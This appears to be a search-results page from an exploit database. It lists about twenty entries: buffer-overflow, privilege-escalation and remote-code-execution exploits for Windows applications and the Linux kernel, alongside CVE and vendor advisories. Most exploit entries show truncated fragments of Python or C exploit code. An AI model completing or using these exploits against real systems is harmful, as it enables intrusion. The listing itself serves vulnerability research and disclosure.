954 matches found
VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit
Exploit for windows platform in category remote exploits from socket import from struct import pack from time import sleep host = "192.168.0.1" port = 80 s = socketAFINET, SOCKSTREAM s.bindhost, port s.listen1 print "\n+ Listening on %d ..." % port cl, addr = s.accept print "+ Connection accepted...
Kingsoft Office Writer 2012 8.1.0.3385 Buffer Overflow
Kingsoft Office Writer 2012 version 8.1.0.3385 SEH buffer overflow exploit that creates a malicious .wps file that pops calc.exe. !/usr/bin/python Exploit Title: Kingsoft Office Writer v2012 8.1.0.3385 .wps Buffer Overflow Exploit SEH Version: 2012 8.1.0.3385 Date: 2013-11-27 Author: Julien Ahren...
XADV-2013003 Linux Kernel fbdev Driver arcfb_write() Overflow
XADV-2013003 Linux Kernel fbdev Driver arcfb_write() Overflow. Vulnerable versions: - linux kernel 3.12 = - linux kernel 2.6.x Testbed: linux kernel 2.6.18 Type:...
php: xml_parse_into_struct buffer overflow when parsing deeply nested XML
ext/xml/xml.c in PHP before 5.3.27 does not properly consider parsing depth, which allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact via a crafted document that is processed by the xml_parse_into_struct function...
MinaliC WebServer 2.0.0 - Remote Buffer Overflow
!/usr/bin/env python Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 Tested on: Windows XP Pro SP2, English Description: Remote command...
RHEL 6 : gdb (RHSA-2013:0522)
Updated gdb packages that fix one security issue and three bugs are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity...
Moderate: Red Hat Security Advisory: gdb security and bug fix update
Updated gdb packages that fix one security issue and three bugs are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity...
Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Howto: Use the app to open the .pxs file from struct import pack file="exploit.pxs" head = "\x50\x68\x6F\x74\x6F\x64\x65\x78\x20\x50\x72\x65\x73\x65\x6E\x74\x65\x72\x20\x53"+...
Linux Kernel Sendpage Local Privilege Escalation
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...
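Linux Kernel epoll Subsystem "eventpoll.c" Multiple Local Denial of Service Vulnerabilities
BUGTRAQ ID: 46630 CVE ID: CVE-2011-1082,CVE-2011-1083 Linux Kernel is the kernel of the Linux operating system. In Linux Kernel versions before 2.6.38, the epoll subsystem implementation in fs/eventpoll.c contains local denial-of-service vulnerabilities: when epoll file descriptors are placed inside other epoll data structures, closed loops and deep chains are not checked, and an attacker can exploit this to cause a denial of service 0 Linux kernel 2.6.38 Vendor patch: Linux ----- The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page: http://www.kernel.or...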
Reverse Engineering SEHOP Chain Validation
Reverse Engineering code of SEHOP Chain Validation by x90c [email protected] -- sehopchainvalidation.c -- typedef struct EXCEPTIONREGISTRATIONRECORD struct EXCEPTIONREGISTRATIONRECORD Next; PEXCEPTIONROUTINE Handler; EXCEPTIONREGISTRATIONRECORD, PEXCEPTIONREGISTRATIONRECORD; / first ER struct o...
Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak
/ Linux include include include include include define DEVICE "/dev/ttyS1" int mainint argc, char argv int ret = 0; int i, fd, reservedsize; char buf; struct serialmultiportstruct buffer; printf"\m/ Linux \n", argv0; exit-1; if argc 2 if reservedsize = atoiargv2 == 0 fprintfstderr, " - Sorry: ato...
Freefloat FTP Server - Remote Buffer Overflow (DEP Bypass)
Freefloat FTP Server - Remote Buffer Overflow DEP Bypass !/usr/bin/python import socket, sys from struct import pack print "\n===============================" print "Freefloat FTP Server DEP Bypass" print " Written by Blake " print "===============================\n" if lensys.argv != 3: print "...
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability
Exploit for windows platform in category remote exploits !/usr/bin/env python part of femtocell research by TU-Berlin only for educational purposes Exploit Title: remote root on sfr/ubiquisys femtocell webserver wsal/shttpd/mongoose Author: nion Software: http://code.google.com/p/mongoose/...
Linux Kernel 2.6.283.0 (DEC Alpha Linux) - Local Privilege Escalation
Linux Kernel 2.6.283.0 DEC Alpha Linux - Local Privilege Escalation / DEC Alpha Linux include include include include include include include include include include define SYSosfwait4 7 define SOCKOFFSET 552 / Offset of skdestruct fptr in sock struct, change for your kernel / define PAGESIZE 819...
CVE-2011-0989
The RuntimeHelpers.InitializeArray method in metadata/icall.c in Mono, when Moonlight 2.x before 2.4.1 or 3.x before 3.99.3 is used, does not properly restrict data types, which allows remote attackers to modify internal read-only data structures, and cause a denial of service (plugin crash) or...
Wordtrainer 3.0 Buffer Overflow
!/usr/bin/python +Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability +Date: 12\04\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.wordtrainer.net/software/files/wt307shwexe/wt307shw.exe +Version: 3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A from struct impo...
Microsoft Windows XP - afd.sys Local Kernel Denial of Service
Microsoft Windows XP - afd.sys Local Kernel Denial of Service //////////////////////////////////////////////////////////////////////////// // // Title: Microsoft Windows xp AFD.sys Local Kernel DoS Exploit // Author: Lufeng Li of Neusoft Corporation // Vendor: www.microsoft.com // Vulnerable:...
Linux Kernel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
Linux Kernel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak / Linux include include include include include include int mainint argc, char argv int fd, ret = 0, i; struct serialicounterstruct buffer; printf" Linux = 2.6.37-rc1 serialcore TIOCGICOUNT leak exploit\n"; ifargc 2 printf" You need to supply a...
Linux Kernel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
/ Linux include include include include include include int mainint argc, char argv int fd, ret = 0, i; struct serialicounterstruct buffer; printf" Linux = 2.6.37-rc1 serialcore TIOCGICOUNT leak exploit\n"; ifargc 2 printf" You need to supply a device name e.g. /dev/ttyS0\n"; exit-1; ;...